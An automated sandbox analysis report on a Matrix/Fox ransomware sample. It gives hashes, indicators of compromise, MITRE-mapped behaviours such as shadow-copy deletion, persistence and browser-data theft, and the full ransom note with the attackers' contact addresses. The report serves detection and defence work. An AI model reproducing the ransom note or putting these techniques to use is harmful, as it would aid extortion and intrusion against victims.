matrix | 016061f330faaeffdd84628f613a719a2f617c8145909d047b5721429ee5b451

Analysis

max time kernel
152s
max time network
168s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
03-04-2024 17:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
Size

1.2MB
MD5

1fa1b6d4b3ed867c1d4baffc77417611
SHA1

afb5e385f9cc8910d7a970b6c32b8d79295579da
SHA256

91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53
SHA512

0600b92914a7489a6428b8e4217e5f24e1d149fc5807d86cc4de91b43be2470a1ddf77093c8732d4371a87fd163cc556e09d11a2c6655382a35a5f5741ae05a5
SSDEEP

24576:K/SA+2lraRrjSJR5ezmT1dM9bBkNIDreFqO:2Xl9Ife

Score

10^/10

matrix discovery persistence ransomware spyware stealer upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://myexternalip.com/raw

Extracted

Path

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7nvvjyxe.default-release\#FOX_README#.rtf

Ransom Note

{\rtf1\ansi\ansicpg1251\deff0\nouicompat\deflang1049{\fonttbl{\f0\fnil\fcharset0 Calibri;}{\f1\fnil\fcharset204 Calibri;}} {\colortbl ;\red255\green0\blue0;\red0\green77\blue187;\red0\green176\blue80;\red0\green0\blue255;\red255\green255\blue255;} {\*\generator Riched20 10.0.15063}\viewkind4\uc1 \pard\ri-500\sa200\sl240\slmult1\qc\tx8804\ul\b\f0\fs28\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\ulnone\f1\lang1049\par \pard\ri-74\sl240\slmult1\tx8378\cf1\f0\fs24\lang1033 ATENTION!!!\par \cf0\b0 We are realy sorry to inform you that \b ALL YOUR FILES WERE ENCRYPTED \par \b0 by our automatic software. It became possible because of bad server security. \par \cf1\b ATENTION!!!\par \cf0\b0 Please don't worry, we can help you to \b RESTORE\b0 your server to original\par state and decrypt all your files quickly and safely!\par \b\par \cf2 INFORMATION!!!\par \cf0\b0 Files are not broken!!!\par Files were encrypted with AES-128+RSA-2048 crypto algorithms.\par There is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \b DELETED AFTER 7 DAYS! \b0 You will irrevocably lose all your data!\par \i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\par * Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\f1\lang1049\par \i0\f0\lang1033\par \cf3\b HOW TO RECOVER FILES???\par \cf0\b0 Please write us to the e-mail \i (write on English or use professional translator)\i0 :\par \pard\sl240\slmult1\b\fs28 [email protected] \par [email protected]\par [email protected]\cf1\fs24\par You have to send your message on each of our 3 emails\f1\lang1049 \f0\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\fs28\par \pard\ri-74\sl240\slmult1\tx8378\cf0\b0\fs24 \par In subject line write your personal ID:\par \b\fs28 3251001E59D73653\par \b0\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \f1\lang1049\par \i * \f0\lang1033 \f1\lang1049 \f0\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \par \i0\par \cf1\b OUR ADVICE!!!\par \cf0\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\par \ul\b\par We will definitely reach an agreement ;) !!!\b0\par \ulnone\par \fs20 \par \par \par \par \par \par \par \pard\ri-74\sl240\slmult1\qc\tx8378\b\fs24 ALTERNATIVE COMMUNICATION\par \b0\fs20\par \pard\ri-74\sl240\slmult1\tx8378 \f1\lang1049 If y\'eeu did n\'eet r\'e5c\'e5iv\'e5 th\'e5 \'e0nsw\'e5r fr\'eem th\'e5 \'e0f\'eer\'e5cit\'e5d \'e5m\'e0il\f0\lang1033 s\f1\lang1049 f\'eer m\'eer\'e5 th\f0\lang1033 e\f1\lang1049 n \f0\lang1033 24\f1\lang1049 h\f0\lang1033 o\f1\lang1049 urs\f0\lang1033 please s\f1\lang1049\'e5\f0\lang1033 nd us Bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 s fr\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r thr\f1\lang1049\'ee\f0\lang1033 ugh th\f1\lang1049\'e5\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 bp\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 {{\field{\*\fldinst{HYPERLINK https://bitmsg.me }}{\fldrslt{https://bitmsg.me\ul0\cf0}}}}\f0\fs20 . B\f1\lang1049\'e5\f0\lang1033 l\f1\lang1049\'ee\f0\lang1033 w is \f1\lang1049\'e0\f0\lang1033 tut\f1\lang1049\'ee\f0\lang1033 ri\f1\lang1049\'e0\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 n h\f1\lang1049\'ee\f0\lang1033 w t\f1\lang1049\'ee\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nd bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 vi\f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r:\par 1. \f1\lang1049\'ce\f0\lang1033 p\f1\lang1049\'e5\f0\lang1033 n in y\f1\lang1049\'ee\f0\lang1033 ur br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r th\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\fldrslt{https://bitmsg.me/users/sign_up\ul0\cf0}}}}\f0\fs20 \f1\lang1049\'e0\f0\lang1033 nd m\f1\lang1049\'e0\f0\lang1033 k\f1\lang1049\'e5\f0\lang1033 th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n b\f1\lang1049\'f3\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 ring n\f1\lang1049\'e0\f0\lang1033 m\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd.\par 2. \f1\lang1049\'d3\'ee\f0\lang1033 u must c\f1\lang1049\'ee\f0\lang1033 nfirm th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n, r\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd f\f1\lang1049\'ee\f0\lang1033 ll\f1\lang1049\'ee\f0\lang1033 w th\f1\lang1049\'e5\f0\lang1033 instructi\f1\lang1049\'ee\f0\lang1033 ns th\f1\lang1049\'e0\f0\lang1033 t w\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nt t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 u.\par 3. R\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 sit\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e0\f0\lang1033 nd \f1\lang1049\'f1\f0\lang1033 lick \f1\lang1049 "\f0\lang1033 L\f1\lang1049\'ee\f0\lang1033 gin\f1\lang1049 "\f0\lang1033 l\f1\lang1049\'e0\f0\lang1033 b\f1\lang1049\'e5\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 r us\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\fldrslt{https://bitmsg.me/users/sign_in\ul0\cf0}}}}\f0\fs20 , \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd \f1\lang1049\'e0\f0\lang1033 nd click th\f1\lang1049\'e5\f0\lang1033 "Sign in" butt\f1\lang1049\'ee\f0\lang1033 n. \f1\lang1049 \f0\lang1033\par 4. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "\f1\lang1049\'d1\f0\lang1033 r\f1\lang1049\'e5\'e0\f0\lang1033 t\f1\lang1049\'e5\f0\lang1033 R\f1\lang1049\'e0\f0\lang1033 nd\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss" butt\f1\lang1049\'ee\f0\lang1033 n.\par 5. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "N\f1\lang1049\'e5\f0\lang1033 w m\f1\lang1049\'e0\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\par \b 6. S\f1\lang1049\'e5\f0\lang1033 nding m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 :\par T\f1\lang1049\'ee\f0\lang1033 :\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss: \b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\par \pard\sl240\slmult1 Subj\f1\lang1049\'e5\'f1\f0\lang1033 t:\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur ID: \b 3251001E59D73653\par M\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 : \b0 D\f1\lang1049\'e5\f0\lang1033 scrib\f1\lang1049\'e5\f0\lang1033 wh\f1\lang1049\'e0\f0\lang1033 t \f1\lang1049\'f3\'ee\f0\lang1033 u think n\f1\lang1049\'e5\f0\lang1033 c\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 r\f1\lang1049\'f3\f0\lang1033 .\par \pard\ri-74\sa200\sl240\slmult1\tx8378\f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "S\f1\lang1049\'e5\f0\lang1033 nd m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\cf5\b\par \pard\sa200\sl240\slmult1\fs28 bk45d8Qu\cf0\f1\fs32\lang1049\par \par }

Emails

[email protected]

[email protected]\par

[email protected]\cf1\fs24\par

URLs

https://bitmsg.me

https://bitmsg.me/users/sign_up

https://bitmsg.me/users/sign_in

Signatures

Matrix Ransomware 64 IoCs

Targeted ransomware with information collection and encryption functionality.

ransomware matrix

description	ioc	Process
File created	C:\Program Files\dotnet\host\fxr\8.0.0\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.0\de\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.0\ko\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Java\jdk-1.8\legal\javafx\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Microsoft Office\root\Office16\MSIPC\da\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\ProgramData\Microsoft\Diagnosis\ScenariosSqlStore\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Microsoft Office\root\Office16\MSIPC\ar\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Java\jdk-1.8\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\Cartridges\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Microsoft Office\root\Office16\MSIPC\sv\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Microsoft Office\root\Office16\FPA_FA000000050\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft Help\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\ProgramData\Microsoft\SmsRouter\MessageStore\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.0\zh-Hans\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Google\Chrome\Application\106.0.5249.119\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Java\jdk-1.8\jre\lib\amd64\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Microsoft Office\root\Office16\Bibliography\Sort\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Java\jre-1.8\lib\security\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Microsoft Office\root\Office16\ADDINS\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\PROOF\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Microsoft Office\root\Office16\MSIPC\vi\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Java\jre-1.8\bin\dtplugin\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Microsoft Office\root\Office16\MSIPC\el\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Microsoft Office\root\Office16\MSIPC\id\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\LibCurl64.DllA\OpenSSL64.DllA\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Microsoft Office\root\Templates\1033\ONENOTE\16\Stationery\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Microsoft Office\root\Office16\Library\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000049\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.25\ko\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Java\jdk-1.8\legal\jdk\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Microsoft Office\PackageManifests\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Microsoft Office\root\Client\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Microsoft Office\root\Office16\Bibliography\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Microsoft Office\root\Office16\MSIPC\sr-Latn-RS\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\1033\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.25\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\ProgramData\Microsoft\Network\Downloader\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Google\Chrome\Application\106.0.5249.119\default_apps\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Java\jdk-1.8\jre\legal\jdk\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Java\jre-1.8\lib\amd64\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Java\jdk-1.8\jre\lib\deploy\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Java\jdk-1.8\include\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Microsoft Office\root\Office16\Configuration\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Microsoft Office\root\Office16\MSIPC\pt\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Microsoft Office\root\Office16\MSIPC\th\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Microsoft Office\root\Office16\FPA_f14\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Microsoft Office\root\Office16\MSIPC\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Microsoft Office\root\Office16\MSIPC\zh-TW\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	F:\$RECYCLE.BIN\S-1-5-21-609813121-2907144057-1731107329-1000\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.0\tr\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Java\jdk-1.8\include\win32\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Java\jre-1.8\legal\jdk\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Microsoft Office\Office16\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\dotnet\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.0\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Users\Admin\Downloads\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Java\jdk-1.8\jre\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Microsoft Office\root\Office16\1036\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Blocklisted process makes network request 1 IoCs

flow	pid	Process
155	1804	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\Drivers\PROCEXP152.SYS	k5CUy3US64.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS"	k5CUy3US64.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000\Control Panel\International\Geo\Nation	wscript.exe

Executes dropped EXE 3 IoCs

pid	Process
4988	NWB3LaOf.exe
396	k5CUy3US.exe
5768	k5CUy3US64.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
5832	takeown.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral10/files/0x000700000002323a-1486.dat	upx
behavioral10/memory/396-1487-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral10/memory/396-3253-0x0000000000400000-0x0000000000477000-memory.dmp	upx

Drops desktop.ini file(s) 4 IoCs

description	ioc	Process
File opened for modification	C:\$Recycle.Bin\S-1-5-21-609813121-2907144057-1731107329-1000\desktop.ini	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	F:\$RECYCLE.BIN\S-1-5-21-609813121-2907144057-1731107329-1000\desktop.ini	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\desktop.ini	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe

Enumerates connected drives 3 TTPs 44 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\S:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened (read-only)	\??\E:	k5CUy3US64.exe
File opened (read-only)	\??\I:	k5CUy3US64.exe
File opened (read-only)	\??\J:	k5CUy3US64.exe
File opened (read-only)	\??\Q:	k5CUy3US64.exe
File opened (read-only)	\??\Z:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened (read-only)	\??\E:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened (read-only)	\??\B:	k5CUy3US64.exe
File opened (read-only)	\??\M:	k5CUy3US64.exe
File opened (read-only)	\??\R:	k5CUy3US64.exe
File opened (read-only)	\??\Q:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened (read-only)	\??\P:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened (read-only)	\??\H:	k5CUy3US64.exe
File opened (read-only)	\??\N:	k5CUy3US64.exe
File opened (read-only)	\??\O:	k5CUy3US64.exe
File opened (read-only)	\??\P:	k5CUy3US64.exe
File opened (read-only)	\??\T:	k5CUy3US64.exe
File opened (read-only)	\??\X:	k5CUy3US64.exe
File opened (read-only)	\??\W:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened (read-only)	\??\Z:	k5CUy3US64.exe
File opened (read-only)	\??\J:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened (read-only)	\??\K:	k5CUy3US64.exe
File opened (read-only)	\??\S:	k5CUy3US64.exe
File opened (read-only)	\??\V:	k5CUy3US64.exe
File opened (read-only)	\??\R:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened (read-only)	\??\N:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened (read-only)	\??\A:	k5CUy3US64.exe
File opened (read-only)	\??\X:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened (read-only)	\??\T:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened (read-only)	\??\M:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened (read-only)	\??\I:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened (read-only)	\??\W:	k5CUy3US64.exe
File opened (read-only)	\??\Y:	k5CUy3US64.exe
